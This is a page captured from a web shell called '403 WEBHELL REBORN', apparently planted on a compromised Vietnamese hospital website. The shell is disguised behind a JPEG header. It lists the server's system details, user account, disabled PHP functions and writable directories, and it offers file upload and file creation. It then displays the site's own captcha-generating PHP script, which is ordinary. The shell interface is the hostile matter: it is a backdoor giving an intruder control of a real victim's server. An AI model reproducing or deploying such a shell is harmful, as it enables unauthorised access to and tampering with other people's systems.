ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/benhviencoc7/domains/benhviendkkvcampha.vn/public_html/data/captcha/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/benhviencoc7/domains/benhviendkkvcampha.vn/public_html////data/captcha/index.php
<?php
/*----------------------------------------*\
|             Copyright © C-ILY            | 
|            Phone: 0983.998.994           |
|             Y!m: notepad.html            |
|         Email: truongpv87@gmail.com      |
\*----------------------------------------*/

session_start();
$cap = imagecreate(100,30);

// Set Values
$white = imagecolorallocate($cap, 255, 255, 255);
$color[0] = imagecolorallocate($cap, 0, 0, 0);
$color[1] = imagecolorallocate($cap, 0, 0, 0);
$color[2] = imagecolorallocate($cap, 0, 0, 0);
$color[3] = imagecolorallocate($cap, 0, 0, 0);
$color[4] = imagecolorallocate($cap, 0, 0, 0);
$font = 'font.ttf';
$number = 5;
$code = "";
// Random Text
$string = md5(time() * time() * time() * time());
for ($i=0; $i<$number; $i++) {
    $text[$i] = substr($string, 0+$i, 1);
    $code .= $text[$i];
}
$_SESSION['captcha'] = $code;

// Random Write Line
for ($j=0; $j<3; $j++) {
    imageline($cap, 0, rand(0,0), 0, rand(0,0), $color[3]);
}

// Random Write Dot
for ($k=0; $k<300; $k++) {
    imagesetpixel($cap, rand(100, 0), rand(0, 200), $color[2]);
}

// Write Text
for ($l=0; $l<$number; $l++) {
    imagettftext($cap, 24, 10, 8+($l*18), 25, $color[rand(0, 4)], $font, $text[$l]);
}

// Begin To Create Image
header('content-type: image/png');
imagepng($cap);

// Clean Up
imagedestroy($cap);

?>

Anon7 - 2021